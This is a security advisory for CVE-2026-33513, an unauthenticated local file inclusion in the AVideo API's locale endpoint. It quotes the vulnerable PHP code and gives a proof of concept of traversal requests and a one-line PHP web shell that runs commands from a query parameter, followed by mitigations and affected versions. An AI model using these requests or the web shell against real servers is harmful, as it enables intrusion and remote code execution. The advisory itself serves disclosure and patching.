GHSA-8fw8-q79c-fp9m

Suggest an improvement
Source
https://github.com/advisories/GHSA-8fw8-q79c-fp9m
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-8fw8-q79c-fp9m/GHSA-8fw8-q79c-fp9m.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-8fw8-q79c-fp9m
Aliases
  • CVE-2026-33513
Published
2026-03-20T21:55:31Z
Modified
2026-03-23T17:31:49Z
Severity
  • 8.6 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L CVSS Calculator
Summary
AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)
Details

Summary

An unauthenticated API endpoint (APIName=locale) concatenates user input into an include path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., view/about.php), and it can escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree.

Details

  • Entry point: plugin/API/get.json.php sets $global['bypassSameDomainCheck']=1 and merges GET/POST/JSON into $parameters without authentication or API secret.
  • Handler: plugin/API/API.php, method get_api_locale() (lines ~5009–5023): 
    $parameters['language'] = strtolower($parameters['language']);
$file = "{$global['systemRootPath']}locale/{$parameters['language']}.php";
if (!file_exists($file)) { return new ApiObject("This language does not exists"); }
include $file;
    No validation is performed; ../ traversal is accepted.
  • Because include executes PHP, any reachable PHP file is executed in the web server context.

PoC

  1. Fetch an arbitrary PHP file (no auth): 
    GET /plugin/API/get.json.php?APIName=locale&language=../view/about HTTP/1.1
Host: <target>
    Response returns the rendered About page HTML, proving traversal outside locale/.
  2. RCE with an attacker PHP file (any writable PHP path): 
    GET /plugin/API/get.json.php?APIName=locale&language=../videos/locale/shell&x=whoami
    If shell.php contains <?php system($_GET['x']); ?>, the response includes command output.

Impact

  • Unauthenticated file inclusion of arbitrary PHP files under the web root.
  • Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.
  • Potential RCE if any attacker-writable PHP file exists elsewhere (not confirmed in this build).
  • Affects any deployment with the API plugin enabled (default in docker-compose).

Mitigation

  • Reject path separators/dots and enforce a strict allowlist of locale slugs.
  • realpath the target and ensure it stays within $systemRootPath/locale.
  • Stop using include for translations; load data from vetted formats (JSON/array).
  • Add authentication (API secret/token) to the endpoint as a secondary control.
Database specific 
{
    "severity": "HIGH",
    "nvd_published_at": null,
    "github_reviewed_at": "2026-03-20T21:55:31Z",
    "cwe_ids": [
        "CWE-22",
        "CWE-98"
    ],
    "github_reviewed": true
}
References

Affected packages

Packagist / wwbn/avideo

Package

Name
wwbn/avideo
Purl
pkg:composer/wwbn/avideo

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
26.0

Affected versions

10.*
10.4
10.8
Other
11
11.*
11.1
11.1.1
11.5
11.6
12.*
12.4
14.*
14.3
14.3.1
14.4
18.*
18.0
21.*
21.0
22.*
22.0
24.*
24.0
25.*
25.0
26.*
26.0

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-8fw8-q79c-fp9m/GHSA-8fw8-q79c-fp9m.json"